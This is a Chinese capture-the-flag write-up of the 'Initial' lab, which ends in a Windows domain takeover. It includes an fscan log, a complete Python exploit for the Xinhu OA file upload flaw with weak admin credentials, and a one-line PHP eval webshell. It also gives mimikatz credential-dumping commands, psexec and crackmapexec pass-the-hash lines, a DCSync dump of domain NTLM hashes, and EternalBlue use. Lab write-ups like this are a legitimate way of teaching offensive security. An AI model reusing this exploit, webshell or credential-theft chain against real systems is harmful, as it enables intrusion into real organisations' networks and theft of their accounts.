春秋云境-Initial

flag01

TP5.0.23 RCE

权限低,先看 suid:FFFF

1
find / -user root -perm -4000 -print 2> result.txt

没有熟悉的,看看 sudo -l

有 mysql

flag{60b53231-

fscan 一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
[2025-03-10 17:44:52] [HOST] 目标:172.22.1.15 状态:alive 详情:protocol=ICMP
[2025-03-10 17:44:52] [HOST] 目标:172.22.1.2 状态:alive 详情:protocol=ICMP
[2025-03-10 17:44:52] [HOST] 目标:172.22.1.21 状态:alive 详情:protocol=ICMP
[2025-03-10 17:44:52] [HOST] 目标:172.22.1.18 状态:alive 详情:protocol=ICMP
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.18 状态:open 详情:port=80
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.15 状态:open 详情:port=80
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.15 状态:open 详情:port=22
[2025-03-10 17:44:55] [SERVICE] 目标:172.22.1.15 状态:identified 详情:banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5., port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.5, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.21 状态:open 详情:port=139
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.2 状态:open 详情:port=139
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.18 状态:open 详情:port=135
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.21 状态:open 详情:port=135
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.2 状态:open 详情:port=135
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.2 状态:open 详情:port=88
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.18 状态:open 详情:port=445
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.2 状态:open 详情:port=445
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.21 状态:open 详情:port=445
[2025-03-10 17:44:55] [PORT] 目标:172.22.1.2 状态:open 详情:port=389
[2025-03-10 17:44:56] [PORT] 目标:172.22.1.18 状态:open 详情:port=139
[2025-03-10 17:44:56] [PORT] 目标:172.22.1.18 状态:open 详情:port=3306
[2025-03-10 17:44:59] [SERVICE] 目标:172.22.1.18 状态:identified 详情:port=3306, service=mysql, product=MySQL, info=unauthorized, banner=D.j Host '172.22.1.15' is not allowed to connect to this MySQL server
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.21 状态:identified 详情:port=139, service=unknown, banner=.
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:port=139, service=unknown, banner=.
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:service=unknown, port=88
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.15 状态:identified 详情:port=80, service=http
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.18 状态:identified 详情:port=80, service=http
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.18 状态:identified 详情:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.21 状态:identified 详情:port=445, service=unknown
[2025-03-10 17:45:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:service=ldap, product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389
[2025-03-10 17:45:01] [SERVICE] 目标:172.22.1.18 状态:identified 详情:port=139, service=unknown, banner=.
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.18 状态:identified 详情:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.21 状态:identified 详情:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:port=135, service=unknown
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.2 状态:identified 详情:ipv6=[], hostname=DC01, ipv4=[172.22.1.2]
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.21 状态:identified 详情:hostname=XIAORANG-WIN7, ipv4=[172.22.1.21], ipv6=[]
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.18 状态:identified 详情:hostname=XIAORANG-OA01, ipv4=[172.22.1.18], ipv6=[]
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.15 状态:identified 详情:title=Bootstrap Material Admin, url=http://172.22.1.15, status_code=200, length=5578, server_info=map[content-type:text/html; charset=utf-8 date:Mon, 10 Mar 2025 09:46:00 GMT length:5578 server:Apache/2.4.41 (Ubuntu) status_code:200 title:Bootstrap Material Admin vary:Accept-Encoding], fingerprints=[], port=80, service=http
[2025-03-10 17:46:00] [SERVICE] 目标:172.22.1.18 状态:identified 详情:status_code=302, length=0, server_info=map[cache-control:no-store, no-cache, must-revalidate content-length:0 content-type:text/html;charset=utf-8 date:Mon, 10 Mar 2025 09:46:00 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:0 location:?m=login pragma:no-cache redirect_url:http://172.22.1.18?m=login server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 set-cookie:PHPSESSID=bea71lrfvntpuv50vadmu4k2io; path=/ status_code:302 title:无标题 x-powered-by:PHP/7.1.9], fingerprints=[], port=80, service=http, title=无标题, url=http://172.22.1.18
[2025-03-10 17:46:01] [VULN] 目标:172.22.1.21 状态:vulnerable 详情:port=445, vulnerability=MS17-010, os=Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[2025-03-10 17:46:01] [SERVICE] 目标:172.22.1.2 状态:identified 详情:netbios_computer=DC01, workstation_service=DC01, server_service=DC01, port=139, computer_name=DC01.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, domain_controllers=XIAORANG, os_version=Windows Server 2016 Datacenter 14393
[2025-03-10 17:46:01] [SERVICE] 目标:172.22.1.2 状态:identified 详情:port=445, service=smb, os=Windows Server 2016 Datacenter 14393
[2025-03-10 17:46:01] [SERVICE] 目标:172.22.1.21 状态:identified 详情:os_version=Windows Server 2008 R2 Enterprise 7601 Service Pack 1, port=139, computer_name=XIAORANG-WIN7.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG, netbios_computer=XIAORANG-WIN7, workstation_service=XIAORANG-WIN7, server_service=XIAORANG-WIN7
[2025-03-10 17:46:01] [SERVICE] 目标:172.22.1.18 状态:identified 详情:netbios_domain=XIAORANG, netbios_computer=XIAORANG-OA01, workstation_service=XIAORANG-OA01, server_service=XIAORANG-OA01, os_version=Windows Server 2012 R2 Datacenter 9600, port=139, computer_name=XIAORANG-OA01.xiaorang.lab, domain_name=xiaorang.lab
[2025-03-10 17:46:01] [SERVICE] 目标:172.22.1.18 状态:identified 详情:url=http://172.22.1.18?m=login, status_code=200, length=4012, server_info=map[cache-control:no-store, no-cache, must-revalidate content-type:text/html;charset=utf-8 date:Mon, 10 Mar 2025 09:46:01 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:4012 pragma:no-cache server:Apache/2.4.23 (Win32) OpenSSL/1.0.2j mod_fcgid/2.3.9 set-cookie:PHPSESSID=nb8sjlpev1nspi1cmrebqc3mpb; path=/ status_code:200 title:信呼协同办公系统 x-powered-by:PHP/7.1.9], fingerprints=[], port=80, service=http, title=信呼协同办公系统
[2025-03-10 17:46:01] [VULN] 目标:http://172.22.1.15:80 状态:vulnerable 详情:vulnerability_type=poc-yaml-thinkphp5023-method-rce, vulnerability_name=poc1, references=[https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce]

flag02

Vulnerability-Wiki/docs-base/docs/oa/信呼 OA-qcloudCosAction.php-任意文件上传漏洞.md at master · Threekiii/Vulnerability-Wiki

弱口令 admin:admin123

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# 1.php为webshell

# 需要修改以下内容:
# url_pre = 'http://<IP>/'
# 'adminuser': '<ADMINUSER_BASE64>',
# 'adminpass': '<ADMINPASS_BASE64>',

import requests

session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'

data1 = {
    'rempass': '0',
    'jmpass': 'false',
    'device': '1625884034525',
    'ltype': '0',
    'adminuser': 'YWRtaW4=',
    'adminpass': 'YWRtaW4xMjM=',
    'yanzm': ''
}

r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})
filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
print(filepath)
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

同目录下一个 1.php:

1
<?php @eval($_POST[1]);?>

2ce3-4813-87d4-

flag03

然后就是永恒之蓝。

打完直接 rdp 连接。

传个猕猴桃上去,管理员运行

1
2
3
privilege::debug
sekurlsa::logonpasswords
lsadump::lsa /patch

有个机器用户和 Administrator

XIAORANG-WIN7$:d7b3C5f125eb29c8f718687e3134b703

Administrator:48f6da83eb89a4da8a1cc963b855a799

psexec 拿 system 权限。

1
psexec.py administrator@172.22.1.21 -hashes :48f6da83eb89a4da8a1cc963b855a799 -codec gbk

DCsync 攻击 是一种针对 Active Directory(AD)域环境 的攻击技术,攻击者通过模拟域控制器(Domain Controller, DC)的行为,利用合法的数据同步协议从其他域控制器中导出用户凭证(如密码哈希)。该攻击通常用于权限提升和横向移动,威胁整个域的安全。

权限要求:

管理员组(Administrators)

域管理员(Domain Admins)

企业管理员(Enterprise Admins)

域控制器计算机账户(Domain Controllers 组的成员)

具有复制权限的自定义账户(如被授予 “复制目录更改”(Replicating Directory Changes) 权限的账户)。

这好像用 msf 打直接就有 system 权限,不用再这么做提权。

1
mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

1
2
3
4
5
6
7
502     krbtgt  fb812eea13a18b7fcdb8e6d67ddc205b        514
1106    Marcus  e07510a4284b3c97c8e7dee970918c5c        512
1107    Charles f6a9881cd5ae709abb4ac9ab87f24617        512
1000    DC01$   f3328438b5155409528f398024d188a5        532480
500     Administrator   10cf89a850fb1cdbe6bb432b859164c8        512
1104    XIAORANG-OA01$  a962df35d97691fd6ceb766e9577f8f0        4096
1108    XIAORANG-WIN7$  d7b3c5f125eb29c8f718687e3134b703        4096

crackmapexec 做 pth:

1
crackmapexec.exe smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "whoami"

flag03: e8f88d0d43d6}